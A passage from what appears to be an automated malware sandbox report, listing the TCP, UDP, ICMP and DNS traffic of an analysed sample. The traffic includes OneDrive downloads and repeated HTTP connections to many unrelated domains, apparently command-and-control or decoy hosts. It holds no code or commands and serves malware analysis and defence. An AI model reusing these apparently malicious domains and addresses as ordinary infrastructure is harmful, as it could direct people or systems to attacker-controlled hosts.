                                                                                Aug 3, 2021 16:17:10.247939110 CEST804975752.58.78.16192.168.2.6
                                                                                Aug 3, 2021 16:17:15.306157112 CEST4975880192.168.2.623.227.38.74
                                                                                Aug 3, 2021 16:17:15.322896957 CEST804975823.227.38.74192.168.2.6
                                                                                Aug 3, 2021 16:17:15.323030949 CEST4975880192.168.2.623.227.38.74
                                                                                Aug 3, 2021 16:17:15.323340893 CEST4975880192.168.2.623.227.38.74
                                                                                Aug 3, 2021 16:17:15.339972019 CEST804975823.227.38.74192.168.2.6
                                                                                Aug 3, 2021 16:17:15.387608051 CEST804975823.227.38.74192.168.2.6
                                                                                Aug 3, 2021 16:17:15.387790918 CEST804975823.227.38.74192.168.2.6
                                                                                Aug 3, 2021 16:17:15.387824059 CEST804975823.227.38.74192.168.2.6
                                                                                Aug 3, 2021 16:17:15.387847900 CEST804975823.227.38.74192.168.2.6
                                                                                Aug 3, 2021 16:17:15.387866974 CEST804975823.227.38.74192.168.2.6
                                                                                Aug 3, 2021 16:17:15.388365030 CEST4975880192.168.2.623.227.38.74
                                                                                Aug 3, 2021 16:17:15.388768911 CEST4975880192.168.2.623.227.38.74
                                                                                Aug 3, 2021 16:17:15.389380932 CEST804975823.227.38.74192.168.2.6
                                                                                Aug 3, 2021 16:17:15.389482021 CEST4975880192.168.2.623.227.38.74
                                                                                Aug 3, 2021 16:17:20.453757048 CEST4975980192.168.2.634.102.136.180
                                                                                Aug 3, 2021 16:17:20.471299887 CEST804975934.102.136.180192.168.2.6
                                                                                Aug 3, 2021 16:17:20.471457958 CEST4975980192.168.2.634.102.136.180
                                                                                Aug 3, 2021 16:17:20.471642971 CEST4975980192.168.2.634.102.136.180
                                                                                Aug 3, 2021 16:17:20.489691973 CEST804975934.102.136.180192.168.2.6
                                                                                Aug 3, 2021 16:17:20.586126089 CEST804975934.102.136.180192.168.2.6
                                                                                Aug 3, 2021 16:17:20.586184025 CEST804975934.102.136.180192.168.2.6
                                                                                Aug 3, 2021 16:17:20.586323977 CEST4975980192.168.2.634.102.136.180
                                                                                Aug 3, 2021 16:17:20.586364985 CEST4975980192.168.2.634.102.136.180
                                                                                Aug 3, 2021 16:17:20.604100943 CEST804975934.102.136.180192.168.2.6
                                                                                Aug 3, 2021 16:17:31.389297962 CEST4976080192.168.2.623.27.129.115
                                                                                Aug 3, 2021 16:17:31.563482046 CEST804976023.27.129.115192.168.2.6
                                                                                Aug 3, 2021 16:17:31.564023972 CEST4976080192.168.2.623.27.129.115
                                                                                Aug 3, 2021 16:17:31.564062119 CEST4976080192.168.2.623.27.129.115
                                                                                Aug 3, 2021 16:17:31.739393950 CEST804976023.27.129.115192.168.2.6
                                                                                Aug 3, 2021 16:17:32.055252075 CEST4976080192.168.2.623.27.129.115
                                                                                Aug 3, 2021 16:17:32.229774952 CEST804976023.27.129.115192.168.2.6
                                                                                Aug 3, 2021 16:17:32.229854107 CEST4976080192.168.2.623.27.129.115
                                                                                Aug 3, 2021 16:17:37.116980076 CEST4976180192.168.2.634.98.99.30
                                                                                Aug 3, 2021 16:17:37.135226011 CEST804976134.98.99.30192.168.2.6
                                                                                Aug 3, 2021 16:17:37.135497093 CEST4976180192.168.2.634.98.99.30
                                                                                Aug 3, 2021 16:17:37.135760069 CEST4976180192.168.2.634.98.99.30
                                                                                Aug 3, 2021 16:17:37.152647018 CEST804976134.98.99.30192.168.2.6
                                                                                Aug 3, 2021 16:17:37.249469042 CEST804976134.98.99.30192.168.2.6
                                                                                Aug 3, 2021 16:17:37.249829054 CEST4976180192.168.2.634.98.99.30
                                                                                Aug 3, 2021 16:17:37.249943972 CEST804976134.98.99.30192.168.2.6
                                                                                Aug 3, 2021 16:17:37.250047922 CEST4976180192.168.2.634.98.99.30
                                                                                Aug 3, 2021 16:17:37.267822981 CEST804976134.98.99.30192.168.2.6
                                                                                Aug 3, 2021 16:17:42.335150003 CEST4976280192.168.2.686.105.245.69
                                                                                Aug 3, 2021 16:17:42.360003948 CEST804976286.105.245.69192.168.2.6
                                                                                Aug 3, 2021 16:17:42.360125065 CEST4976280192.168.2.686.105.245.69
                                                                                Aug 3, 2021 16:17:42.360260010 CEST4976280192.168.2.686.105.245.69
                                                                                Aug 3, 2021 16:17:42.385899067 CEST804976286.105.245.69192.168.2.6
                                                                                Aug 3, 2021 16:17:42.403304100 CEST804976286.105.245.69192.168.2.6
                                                                                Aug 3, 2021 16:17:42.403554916 CEST4976280192.168.2.686.105.245.69
                                                                                Aug 3, 2021 16:17:42.403633118 CEST4976280192.168.2.686.105.245.69
                                                                                Aug 3, 2021 16:17:42.428771019 CEST804976286.105.245.69192.168.2.6
                                                                                Aug 3, 2021 16:17:47.472215891 CEST4976380192.168.2.635.186.238.101
                                                                                Aug 3, 2021 16:17:47.489722013 CEST804976335.186.238.101192.168.2.6
                                                                                Aug 3, 2021 16:17:47.489907026 CEST4976380192.168.2.635.186.238.101
                                                                                Aug 3, 2021 16:17:47.490041971 CEST4976380192.168.2.635.186.238.101
                                                                                Aug 3, 2021 16:17:47.507467985 CEST804976335.186.238.101192.168.2.6
                                                                                Aug 3, 2021 16:17:47.603698015 CEST804976335.186.238.101192.168.2.6
                                                                                Aug 3, 2021 16:17:47.603766918 CEST804976335.186.238.101192.168.2.6
                                                                                Aug 3, 2021 16:17:47.603929043 CEST4976380192.168.2.635.186.238.101
                                                                                Aug 3, 2021 16:17:47.604012966 CEST4976380192.168.2.635.186.238.101
                                                                                Aug 3, 2021 16:17:47.621479988 CEST804976335.186.238.101192.168.2.6
                                                                                Aug 3, 2021 16:18:01.973068953 CEST4976480192.168.2.6154.215.87.120
                                                                                Aug 3, 2021 16:18:02.251478910 CEST8049764154.215.87.120192.168.2.6
                                                                                Aug 3, 2021 16:18:02.262325048 CEST4976480192.168.2.6154.215.87.120
                                                                                Aug 3, 2021 16:18:02.262365103 CEST4976480192.168.2.6154.215.87.120
                                                                                Aug 3, 2021 16:18:02.540993929 CEST8049764154.215.87.120192.168.2.6
                                                                                Aug 3, 2021 16:18:02.541553974 CEST8049764154.215.87.120192.168.2.6
                                                                                Aug 3, 2021 16:18:02.541733980 CEST4976480192.168.2.6154.215.87.120
                                                                                Aug 3, 2021 16:18:02.541771889 CEST4976480192.168.2.6154.215.87.120
                                                                                Aug 3, 2021 16:18:02.828800917 CEST8049764154.215.87.120192.168.2.6
                                                                                Aug 3, 2021 16:18:07.705199003 CEST4976580192.168.2.664.190.62.111
                                                                                Aug 3, 2021 16:18:07.726985931 CEST804976564.190.62.111192.168.2.6
                                                                                Aug 3, 2021 16:18:07.727109909 CEST4976580192.168.2.664.190.62.111
                                                                                Aug 3, 2021 16:18:07.727356911 CEST4976580192.168.2.664.190.62.111
                                                                                Aug 3, 2021 16:18:07.754405975 CEST804976564.190.62.111192.168.2.6
                                                                                Aug 3, 2021 16:18:07.778529882 CEST804976564.190.62.111192.168.2.6
                                                                                Aug 3, 2021 16:18:07.779022932 CEST4976580192.168.2.664.190.62.111
                                                                                Aug 3, 2021 16:18:07.779170990 CEST804976564.190.62.111192.168.2.6
                                                                                Aug 3, 2021 16:18:07.779664993 CEST4976580192.168.2.664.190.62.111
                                                                                Aug 3, 2021 16:18:07.801400900 CEST804976564.190.62.111192.168.2.6
                                                                                Aug 3, 2021 16:18:17.889662027 CEST4976680192.168.2.634.102.136.180
                                                                                Aug 3, 2021 16:18:17.906797886 CEST804976634.102.136.180192.168.2.6
                                                                                Aug 3, 2021 16:18:17.907012939 CEST4976680192.168.2.634.102.136.180
                                                                                Aug 3, 2021 16:18:17.907407045 CEST4976680192.168.2.634.102.136.180
                                                                                Aug 3, 2021 16:18:17.924660921 CEST804976634.102.136.180192.168.2.6
                                                                                Aug 3, 2021 16:18:18.021646023 CEST804976634.102.136.180192.168.2.6
                                                                                Aug 3, 2021 16:18:18.023150921 CEST804976634.102.136.180192.168.2.6
                                                                                Aug 3, 2021 16:18:18.023261070 CEST4976680192.168.2.634.102.136.180
                                                                                Aug 3, 2021 16:18:18.023628950 CEST4976680192.168.2.634.102.136.180
                                                                                Aug 3, 2021 16:18:18.041008949 CEST804976634.102.136.180192.168.2.6

                                                                                UDP Packets

                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Aug 3, 2021 16:15:10.131180048 CEST6034253192.168.2.68.8.8.8
                                                                                Aug 3, 2021 16:15:10.155750990 CEST53603428.8.8.8192.168.2.6
                                                                                Aug 3, 2021 16:15:10.687819004 CEST6134653192.168.2.68.8.8.8
                                                                                Aug 3, 2021 16:15:10.721673012 CEST53613468.8.8.8192.168.2.6
                                                                                Aug 3, 2021 16:15:10.923157930 CEST5177453192.168.2.68.8.8.8
                                                                                Aug 3, 2021 16:15:10.948098898 CEST53517748.8.8.8192.168.2.6
                                                                                Aug 3, 2021 16:15:12.110641003 CEST5602353192.168.2.68.8.8.8
                                                                                Aug 3, 2021 16:15:12.138396025 CEST53560238.8.8.8192.168.2.6
                                                                                Aug 3, 2021 16:15:12.946723938 CEST5838453192.168.2.68.8.8.8
                                                                                Aug 3, 2021 16:15:12.972160101 CEST53583848.8.8.8192.168.2.6
                                                                                Aug 3, 2021 16:15:13.752521992 CEST6026153192.168.2.68.8.8.8
                                                                                Aug 3, 2021 16:15:13.780518055 CEST53602618.8.8.8192.168.2.6
                                                                                Aug 3, 2021 16:15:15.004846096 CEST5606153192.168.2.68.8.8.8
                                                                                Aug 3, 2021 16:15:15.039030075 CEST53560618.8.8.8192.168.2.6
                                                                                Aug 3, 2021 16:15:15.859252930 CEST5833653192.168.2.68.8.8.8
                                                                                Aug 3, 2021 16:15:15.884999990 CEST53583368.8.8.8192.168.2.6
                                                                                Aug 3, 2021 16:15:19.278027058 CEST5378153192.168.2.68.8.8.8
                                                                                Aug 3, 2021 16:15:19.315892935 CEST53537818.8.8.8192.168.2.6
                                                                                Aug 3, 2021 16:15:19.498323917 CEST5406453192.168.2.68.8.8.8
                                                                                Aug 3, 2021 16:15:19.523400068 CEST53540648.8.8.8192.168.2.6
                                                                                Aug 3, 2021 16:15:19.823651075 CEST5281153192.168.2.68.8.8.8
                                                                                Aug 3, 2021 16:15:19.881380081 CEST53528118.8.8.8192.168.2.6
                                                                                Aug 3, 2021 16:15:20.495740891 CEST5529953192.168.2.68.8.8.8
                                                                                Aug 3, 2021 16:15:20.520819902 CEST53552998.8.8.8192.168.2.6
                                                                                Aug 3, 2021 16:15:21.492032051 CEST6374553192.168.2.68.8.8.8
                                                                                Aug 3, 2021 16:15:21.525039911 CEST53637458.8.8.8192.168.2.6
                                                                                Aug 3, 2021 16:15:22.537538052 CEST5005553192.168.2.68.8.8.8
                                                                                Aug 3, 2021 16:15:22.576544046 CEST53500558.8.8.8192.168.2.6
                                                                                Aug 3, 2021 16:15:23.591212988 CEST6137453192.168.2.68.8.8.8
                                                                                Aug 3, 2021 16:15:23.627068043 CEST53613748.8.8.8192.168.2.6
                                                                                Aug 3, 2021 16:15:24.512423992 CEST5033953192.168.2.68.8.8.8
                                                                                Aug 3, 2021 16:15:24.537693977 CEST53503398.8.8.8192.168.2.6
                                                                                Aug 3, 2021 16:15:25.562366962 CEST6330753192.168.2.68.8.8.8
                                                                                Aug 3, 2021 16:15:25.587574005 CEST53633078.8.8.8192.168.2.6
                                                                                Aug 3, 2021 16:15:26.723697901 CEST4969453192.168.2.68.8.8.8
                                                                                Aug 3, 2021 16:15:26.748583078 CEST53496948.8.8.8192.168.2.6
                                                                                Aug 3, 2021 16:15:27.548985958 CEST5498253192.168.2.68.8.8.8
                                                                                Aug 3, 2021 16:15:27.585879087 CEST53549828.8.8.8192.168.2.6
                                                                                Aug 3, 2021 16:15:28.759500980 CEST5001053192.168.2.68.8.8.8
                                                                                Aug 3, 2021 16:15:28.789630890 CEST53500108.8.8.8192.168.2.6
                                                                                Aug 3, 2021 16:15:45.152842045 CEST6371853192.168.2.68.8.8.8
                                                                                Aug 3, 2021 16:15:45.203012943 CEST53637188.8.8.8192.168.2.6
                                                                                Aug 3, 2021 16:15:46.995280981 CEST6211653192.168.2.68.8.8.8
                                                                                Aug 3, 2021 16:15:47.027770996 CEST53621168.8.8.8192.168.2.6
                                                                                Aug 3, 2021 16:15:47.592468023 CEST6381653192.168.2.68.8.8.8
                                                                                Aug 3, 2021 16:15:47.628174067 CEST53638168.8.8.8192.168.2.6
                                                                                Aug 3, 2021 16:15:55.983047009 CEST5501453192.168.2.68.8.8.8
                                                                                Aug 3, 2021 16:15:56.018642902 CEST53550148.8.8.8192.168.2.6
                                                                                Aug 3, 2021 16:15:56.575704098 CEST6220853192.168.2.68.8.8.8
                                                                                Aug 3, 2021 16:15:56.609251022 CEST53622088.8.8.8192.168.2.6
                                                                                Aug 3, 2021 16:16:05.518102884 CEST5757453192.168.2.68.8.8.8
                                                                                Aug 3, 2021 16:16:05.550806999 CEST53575748.8.8.8192.168.2.6
                                                                                Aug 3, 2021 16:16:14.622528076 CEST5181853192.168.2.68.8.8.8
                                                                                Aug 3, 2021 16:16:14.661019087 CEST53518188.8.8.8192.168.2.6
                                                                                Aug 3, 2021 16:16:19.783152103 CEST5662853192.168.2.68.8.8.8
                                                                                Aug 3, 2021 16:16:19.808348894 CEST53566288.8.8.8192.168.2.6
                                                                                Aug 3, 2021 16:16:20.702518940 CEST6077853192.168.2.68.8.8.8
                                                                                Aug 3, 2021 16:16:20.735666037 CEST53607788.8.8.8192.168.2.6
                                                                                Aug 3, 2021 16:16:21.790317059 CEST5379953192.168.2.68.8.8.8
                                                                                Aug 3, 2021 16:16:21.826452017 CEST53537998.8.8.8192.168.2.6
                                                                                Aug 3, 2021 16:16:22.279573917 CEST5468353192.168.2.68.8.8.8
                                                                                Aug 3, 2021 16:16:22.304653883 CEST53546838.8.8.8192.168.2.6
                                                                                Aug 3, 2021 16:16:22.764369965 CEST5932953192.168.2.68.8.8.8
                                                                                Aug 3, 2021 16:16:22.807867050 CEST53593298.8.8.8192.168.2.6
                                                                                Aug 3, 2021 16:16:23.017640114 CEST6402153192.168.2.68.8.8.8
                                                                                Aug 3, 2021 16:16:23.051059961 CEST53640218.8.8.8192.168.2.6
                                                                                Aug 3, 2021 16:16:23.568423033 CEST5612953192.168.2.68.8.8.8
                                                                                Aug 3, 2021 16:16:23.595877886 CEST53561298.8.8.8192.168.2.6
                                                                                Aug 3, 2021 16:16:24.237236977 CEST5817753192.168.2.68.8.8.8
                                                                                Aug 3, 2021 16:16:24.262470961 CEST53581778.8.8.8192.168.2.6
                                                                                Aug 3, 2021 16:16:25.610075951 CEST5070053192.168.2.68.8.8.8
                                                                                Aug 3, 2021 16:16:25.643716097 CEST53507008.8.8.8192.168.2.6
                                                                                Aug 3, 2021 16:16:28.345086098 CEST5406953192.168.2.68.8.8.8
                                                                                Aug 3, 2021 16:16:28.379746914 CEST53540698.8.8.8192.168.2.6
                                                                                Aug 3, 2021 16:16:29.807466030 CEST6117853192.168.2.68.8.8.8
                                                                                Aug 3, 2021 16:16:29.843164921 CEST53611788.8.8.8192.168.2.6
                                                                                Aug 3, 2021 16:16:45.117161036 CEST5701753192.168.2.68.8.8.8
                                                                                Aug 3, 2021 16:16:45.151416063 CEST53570178.8.8.8192.168.2.6
                                                                                Aug 3, 2021 16:17:08.017854929 CEST5632753192.168.2.68.8.8.8
                                                                                Aug 3, 2021 16:17:08.060178041 CEST53563278.8.8.8192.168.2.6
                                                                                Aug 3, 2021 16:17:10.111151934 CEST5024353192.168.2.68.8.8.8
                                                                                Aug 3, 2021 16:17:10.147648096 CEST53502438.8.8.8192.168.2.6
                                                                                Aug 3, 2021 16:17:15.252206087 CEST6205553192.168.2.68.8.8.8
                                                                                Aug 3, 2021 16:17:15.304837942 CEST53620558.8.8.8192.168.2.6
                                                                                Aug 3, 2021 16:17:20.401591063 CEST6124953192.168.2.68.8.8.8
                                                                                Aug 3, 2021 16:17:20.452202082 CEST53612498.8.8.8192.168.2.6
                                                                                Aug 3, 2021 16:17:26.282520056 CEST6525253192.168.2.68.8.8.8
                                                                                Aug 3, 2021 16:17:26.333045959 CEST53652528.8.8.8192.168.2.6
                                                                                Aug 3, 2021 16:17:31.339685917 CEST6436753192.168.2.68.8.8.8
                                                                                Aug 3, 2021 16:17:31.387835026 CEST53643678.8.8.8192.168.2.6
                                                                                Aug 3, 2021 16:17:37.077227116 CEST5506653192.168.2.68.8.8.8
                                                                                Aug 3, 2021 16:17:37.115644932 CEST53550668.8.8.8192.168.2.6
                                                                                Aug 3, 2021 16:17:42.288511038 CEST6021153192.168.2.68.8.8.8
                                                                                Aug 3, 2021 16:17:42.331386089 CEST53602118.8.8.8192.168.2.6
                                                                                Aug 3, 2021 16:17:47.424863100 CEST5657053192.168.2.68.8.8.8
                                                                                Aug 3, 2021 16:17:47.470793962 CEST53565708.8.8.8192.168.2.6
                                                                                Aug 3, 2021 16:17:52.630390882 CEST5845453192.168.2.68.8.8.8
                                                                                Aug 3, 2021 16:17:53.588510990 CEST5845453192.168.2.68.8.8.8
                                                                                Aug 3, 2021 16:17:54.660033941 CEST5845453192.168.2.68.8.8.8
                                                                                Aug 3, 2021 16:17:56.720144033 CEST53584548.8.8.8192.168.2.6
                                                                                Aug 3, 2021 16:17:56.725507021 CEST5845453192.168.2.68.8.8.8
                                                                                Aug 3, 2021 16:17:57.380450964 CEST53584548.8.8.8192.168.2.6
                                                                                Aug 3, 2021 16:17:57.799863100 CEST53584548.8.8.8192.168.2.6
                                                                                Aug 3, 2021 16:17:59.170057058 CEST53584548.8.8.8192.168.2.6
                                                                                Aug 3, 2021 16:18:01.768387079 CEST5518053192.168.2.68.8.8.8
                                                                                Aug 3, 2021 16:18:01.965739965 CEST53551808.8.8.8192.168.2.6
                                                                                Aug 3, 2021 16:18:07.571434975 CEST5872153192.168.2.68.8.8.8
                                                                                Aug 3, 2021 16:18:07.703706026 CEST53587218.8.8.8192.168.2.6
                                                                                Aug 3, 2021 16:18:17.848912001 CEST5769153192.168.2.68.8.8.8
                                                                                Aug 3, 2021 16:18:17.888134956 CEST53576918.8.8.8192.168.2.6
                                                                                Aug 3, 2021 16:18:23.032887936 CEST5294353192.168.2.68.8.8.8
                                                                                Aug 3, 2021 16:18:23.075978994 CEST53529438.8.8.8192.168.2.6
                                                                                Aug 3, 2021 16:18:28.297971010 CEST5948953192.168.2.68.8.8.8
                                                                                Aug 3, 2021 16:18:28.356432915 CEST53594898.8.8.8192.168.2.6
                                                                                Aug 3, 2021 16:18:33.457143068 CEST6402253192.168.2.68.8.8.8
                                                                                Aug 3, 2021 16:18:33.597852945 CEST53640228.8.8.8192.168.2.6
                                                                                Aug 3, 2021 16:18:53.900857925 CEST6002353192.168.2.68.8.8.8
                                                                                Aug 3, 2021 16:18:53.953155041 CEST53600238.8.8.8192.168.2.6
                                                                                Aug 3, 2021 16:19:19.783613920 CEST5719353192.168.2.68.8.8.8
                                                                                Aug 3, 2021 16:19:20.798435926 CEST5719353192.168.2.68.8.8.8
                                                                                Aug 3, 2021 16:19:21.798687935 CEST5719353192.168.2.68.8.8.8
                                                                                Aug 3, 2021 16:19:23.830851078 CEST5719353192.168.2.68.8.8.8
                                                                                Aug 3, 2021 16:19:24.063231945 CEST53571938.8.8.8192.168.2.6
                                                                                Aug 3, 2021 16:19:24.145198107 CEST53571938.8.8.8192.168.2.6
                                                                                Aug 3, 2021 16:19:24.337505102 CEST53571938.8.8.8192.168.2.6
                                                                                Aug 3, 2021 16:19:27.819940090 CEST53571938.8.8.8192.168.2.6

                                                                                ICMP Packets

                                                                                TimestampSource IPDest IPChecksumCodeType
                                                                                Aug 3, 2021 16:17:57.380606890 CEST192.168.2.68.8.8.8cff4(Port unreachable)Destination Unreachable
                                                                                Aug 3, 2021 16:17:59.170248032 CEST192.168.2.68.8.8.8cff4(Port unreachable)Destination Unreachable
                                                                                Aug 3, 2021 16:19:24.145282984 CEST192.168.2.68.8.8.8cff4(Port unreachable)Destination Unreachable
                                                                                Aug 3, 2021 16:19:27.820550919 CEST192.168.2.68.8.8.8cff4(Port unreachable)Destination Unreachable

                                                                                DNS Queries

                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                Aug 3, 2021 16:15:19.278027058 CEST192.168.2.68.8.8.80x5ff7Standard query (0)onedrive.live.comA (IP address)IN (0x0001)
                                                                                Aug 3, 2021 16:15:19.823651075 CEST192.168.2.68.8.8.80xad73Standard query (0)pxqklq.sn.files.1drv.comA (IP address)IN (0x0001)
                                                                                Aug 3, 2021 16:15:46.995280981 CEST192.168.2.68.8.8.80x2076Standard query (0)onedrive.live.comA (IP address)IN (0x0001)
                                                                                Aug 3, 2021 16:15:47.592468023 CEST192.168.2.68.8.8.80xf3d3Standard query (0)pxqklq.sn.files.1drv.comA (IP address)IN (0x0001)
                                                                                Aug 3, 2021 16:15:55.983047009 CEST192.168.2.68.8.8.80x3f26Standard query (0)onedrive.live.comA (IP address)IN (0x0001)
                                                                                Aug 3, 2021 16:15:56.575704098 CEST192.168.2.68.8.8.80x2b2aStandard query (0)pxqklq.sn.files.1drv.comA (IP address)IN (0x0001)
                                                                                Aug 3, 2021 16:17:10.111151934 CEST192.168.2.68.8.8.80x38faStandard query (0)www.mobiessence.comA (IP address)IN (0x0001)
                                                                                Aug 3, 2021 16:17:15.252206087 CEST192.168.2.68.8.8.80xcd43Standard query (0)www.trendyheld.comA (IP address)IN (0x0001)
                                                                                Aug 3, 2021 16:17:20.401591063 CEST192.168.2.68.8.8.80x758fStandard query (0)www.beastninjas.comA (IP address)IN (0x0001)
                                                                                Aug 3, 2021 16:17:26.282520056 CEST192.168.2.68.8.8.80x9fbStandard query (0)www.titanusedcarsworth.comA (IP address)IN (0x0001)
                                                                                Aug 3, 2021 16:17:31.339685917 CEST192.168.2.68.8.8.80x9bc4Standard query (0)www.importexportasia.comA (IP address)IN (0x0001)
                                                                                Aug 3, 2021 16:17:37.077227116 CEST192.168.2.68.8.8.80x906bStandard query (0)www.kilbyrnefarm.comA (IP address)IN (0x0001)
                                                                                Aug 3, 2021 16:17:42.288511038 CEST192.168.2.68.8.8.80xd9d0Standard query (0)www.dragonshipping.comA (IP address)IN (0x0001)
                                                                                Aug 3, 2021 16:17:47.424863100 CEST192.168.2.68.8.8.80x4139Standard query (0)www.mylifeinpark.comA (IP address)IN (0x0001)
                                                                                Aug 3, 2021 16:17:52.630390882 CEST192.168.2.68.8.8.80x2974Standard query (0)www.f9fui8.xyzA (IP address)IN (0x0001)
                                                                                Aug 3, 2021 16:17:53.588510990 CEST192.168.2.68.8.8.80x2974Standard query (0)www.f9fui8.xyzA (IP address)IN (0x0001)
                                                                                Aug 3, 2021 16:17:54.660033941 CEST192.168.2.68.8.8.80x2974Standard query (0)www.f9fui8.xyzA (IP address)IN (0x0001)
                                                                                Aug 3, 2021 16:17:56.725507021 CEST192.168.2.68.8.8.80x2974Standard query (0)www.f9fui8.xyzA (IP address)IN (0x0001)
                                                                                Aug 3, 2021 16:18:01.768387079 CEST192.168.2.68.8.8.80xa3d4Standard query (0)www.delhibudokankarate.comA (IP address)IN (0x0001)
                                                                                Aug 3, 2021 16:18:07.571434975 CEST192.168.2.68.8.8.80x9f74Standard query (0)www.vavasoo.comA (IP address)IN (0x0001)
                                                                                Aug 3, 2021 16:18:17.848912001 CEST192.168.2.68.8.8.80x6d96Standard query (0)www.schoolfrontoffice.comA (IP address)IN (0x0001)
                                                                                Aug 3, 2021 16:18:23.032887936 CEST192.168.2.68.8.8.80xc142Standard query (0)www.mypursuitpodcast.comA (IP address)IN (0x0001)
                                                                                Aug 3, 2021 16:18:28.297971010 CEST192.168.2.68.8.8.80x5b26Standard query (0)www.besport24.comA (IP address)IN (0x0001)
                                                                                Aug 3, 2021 16:18:33.457143068 CEST192.168.2.68.8.8.80xee58Standard query (0)www.opticatervisof.comA (IP address)IN (0x0001)
                                                                                Aug 3, 2021 16:18:53.900857925 CEST192.168.2.68.8.8.80xe37bStandard query (0)www.titanusedcarsworth.comA (IP address)IN (0x0001)
                                                                                Aug 3, 2021 16:19:19.783613920 CEST192.168.2.68.8.8.80x8800Standard query (0)www.f9fui8.xyzA (IP address)IN (0x0001)
                                                                                Aug 3, 2021 16:19:20.798435926 CEST192.168.2.68.8.8.80x8800Standard query (0)www.f9fui8.xyzA (IP address)IN (0x0001)
                                                                                Aug 3, 2021 16:19:21.798687935 CEST192.168.2.68.8.8.80x8800Standard query (0)www.f9fui8.xyzA (IP address)IN (0x0001)
                                                                                Aug 3, 2021 16:19:23.830851078 CEST192.168.2.68.8.8.80x8800Standard query (0)www.f9fui8.xyzA (IP address)IN (0x0001)

                                                                                DNS Answers

                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                Aug 3, 2021 16:15:19.315892935 CEST8.8.8.8192.168.2.60x5ff7No error (0)onedrive.live.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)
                                                                                Aug 3, 2021 16:15:19.881380081 CEST8.8.8.8192.168.2.60xad73No error (0)pxqklq.sn.files.1drv.comsn-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)
                                                                                Aug 3, 2021 16:15:19.881380081 CEST8.8.8.8192.168.2.60xad73No error (0)sn-files.fe.1drv.comodc-sn-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)
                                                                                Aug 3, 2021 16:15:47.027770996 CEST8.8.8.8192.168.2.60x2076No error (0)onedrive.live.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)
                                                                                Aug 3, 2021 16:15:47.628174067 CEST8.8.8.8192.168.2.60xf3d3No error (0)pxqklq.sn.files.1drv.comsn-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)
                                                                                Aug 3, 2021 16:15:47.628174067 CEST8.8.8.8192.168.2.60xf3d3No error (0)sn-files.fe.1drv.comodc-sn-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)
                                                                                Aug 3, 2021 16:15:56.018642902 CEST8.8.8.8192.168.2.60x3f26No error (0)onedrive.live.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)
                                                                                Aug 3, 2021 16:15:56.609251022 CEST8.8.8.8192.168.2.60x2b2aNo error (0)pxqklq.sn.files.1drv.comsn-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)
                                                                                Aug 3, 2021 16:15:56.609251022 CEST8.8.8.8192.168.2.60x2b2aNo error (0)sn-files.fe.1drv.comodc-sn-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)
                                                                                Aug 3, 2021 16:17:10.147648096 CEST8.8.8.8192.168.2.60x38faNo error (0)www.mobiessence.com52.58.78.16A (IP address)IN (0x0001)
                                                                                Aug 3, 2021 16:17:15.304837942 CEST8.8.8.8192.168.2.60xcd43No error (0)www.trendyheld.comtrendy-heroes.myshopify.comCNAME (Canonical name)IN (0x0001)
                                                                                Aug 3, 2021 16:17:15.304837942 CEST8.8.8.8192.168.2.60xcd43No error (0)trendy-heroes.myshopify.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)
                                                                                Aug 3, 2021 16:17:15.304837942 CEST8.8.8.8192.168.2.60xcd43No error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)
                                                                                Aug 3, 2021 16:17:20.452202082 CEST8.8.8.8192.168.2.60x758fNo error (0)www.beastninjas.combeastninjas.comCNAME (Canonical name)IN (0x0001)
                                                                                Aug 3, 2021 16:17:20.452202082 CEST8.8.8.8192.168.2.60x758fNo error (0)beastninjas.com34.102.136.180A (IP address)IN (0x0001)
                                                                                Aug 3, 2021 16:17:26.333045959 CEST8.8.8.8192.168.2.60x9fbName error (3)www.titanusedcarsworth.comnonenoneA (IP address)IN (0x0001)
                                                                                Aug 3, 2021 16:17:31.387835026 CEST8.8.8.8192.168.2.60x9bc4No error (0)www.importexportasia.com23.27.129.115A (IP address)IN (0x0001)
                                                                                Aug 3, 2021 16:17:37.115644932 CEST8.8.8.8192.168.2.60x906bNo error (0)www.kilbyrnefarm.comkilbyrnefarm.comCNAME (Canonical name)IN (0x0001)
                                                                                Aug 3, 2021 16:17:37.115644932 CEST8.8.8.8192.168.2.60x906bNo error (0)kilbyrnefarm.com34.98.99.30A (IP address)IN (0x0001)
                                                                                Aug 3, 2021 16:17:42.331386089 CEST8.8.8.8192.168.2.60xd9d0No error (0)www.dragonshipping.com86.105.245.69A (IP address)IN (0x0001)
                                                                                Aug 3, 2021 16:17:47.470793962 CEST8.8.8.8192.168.2.60x4139No error (0)www.mylifeinpark.com35.186.238.101A (IP address)IN (0x0001)
                                                                                Aug 3, 2021 16:17:56.720144033 CEST8.8.8.8192.168.2.60x2974Server failure (2)www.f9fui8.xyznonenoneA (IP address)IN (0x0001)
                                                                                Aug 3, 2021 16:17:57.380450964 CEST8.8.8.8192.168.2.60x2974Server failure (2)www.f9fui8.xyznonenoneA (IP address)IN (0x0001)
                                                                                Aug 3, 2021 16:17:57.799863100 CEST8.8.8.8192.168.2.60x2974Server failure (2)www.f9fui8.xyznonenoneA (IP address)IN (0x0001)
                                                                                Aug 3, 2021 16:17:59.170057058 CEST8.8.8.8192.168.2.60x2974Server failure (2)www.f9fui8.xyznonenoneA (IP address)IN (0x0001)
                                                                                Aug 3, 2021 16:18:01.965739965 CEST8.8.8.8192.168.2.60xa3d4No error (0)www.delhibudokankarate.com154.215.87.120A (IP address)IN (0x0001)
                                                                                Aug 3, 2021 16:18:07.703706026 CEST8.8.8.8192.168.2.60x9f74No error (0)www.vavasoo.com64.190.62.111A (IP address)IN (0x0001)
                                                                                Aug 3, 2021 16:18:17.888134956 CEST8.8.8.8192.168.2.60x6d96No error (0)www.schoolfrontoffice.comschoolfrontoffice.comCNAME (Canonical name)IN (0x0001)
